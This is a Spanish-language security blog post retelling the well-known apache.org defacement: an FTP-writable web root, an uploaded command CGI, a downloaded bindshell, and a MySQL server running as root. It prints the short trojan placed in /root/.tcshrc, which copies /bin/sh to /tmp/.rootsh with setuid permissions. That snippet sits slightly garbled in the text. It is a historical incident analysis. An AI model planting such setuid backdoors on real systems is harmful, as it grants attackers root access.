La historia original la podéis ver en la cache de google, o buscando por el nombre del archivo: how.defaced.apache.org.txt y ver el defacement en Attrition.
Básicamente la intrusión pudo ocurrir por varios motivos:
1. El DocumentRoot del servidor web era el mismo DocumentRoot del servidor ftp.
2. Dentro del DocumentRoot se permitía la creación de ficheros.
Esto fue observado por los hackers, que rápidamente generaron un cgi que les permitiese ejecutar comandos y lo subieron vía FTP, ahora solo tendría que acceder a través de la web a ese cgi para llamar a los binarios que quisieran ejecutar. La barrera más difícil de cruzar, ya había sido rota.
Los intrusos decidieron subir una "bindshell", para facilitarse el acceso mediante telnet, así que realizaron una llamada al cgi que habían subido para descargar esta herramienta, y posteriormente ejecutarla, abriendo un nuevo puerto al que tendrían acceso directo mediante una contraseña.
Con acceso local al sistema, ya conocían que el sistema operativo era un FreeBSD, podían haber roto la seguridad explotando alguna vulnerabilidad conocida y conseguir de este modo permisos de superusuario, pero el objetivo era llegar a ese mismo hito únicamente utilizando errores de configuración.
El siguiente paso fue conseguir acceso al servidor de base de datos que ejecutaba el equipo. Un MySQL con una cuenta trivial, nombre de usuario "bugs". Mediante este nuevo acceso con nuevos privilegios, puesto que el mysql se ejecutaba con usuario root, era posible escribir archivos allí donde fuera necesario como usuario root y con permisos 666.
Con esta posibilidad, crearon un pequeño troyano en el fichero: /root/.tcshrc
#!/bin/shAhora solo tenían que esperar a que uno de los ¡¡¡¡¡9!!!!! administradores se logeara en el sistema y ejecutara un "su". No tardó mucho en ocurrir.
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
Los hackers reportaron la intrusión después de arreglar ellos mismos algunos fallos.
Impresionante, ¿no?
Fuente: http://www.securitybydefault.com/2008/09/hackeos-memorables-apacheorg.html
No comments:
Post a Comment
Gracias por dejar un comentario en Segu-Info.
Gracias por comentar!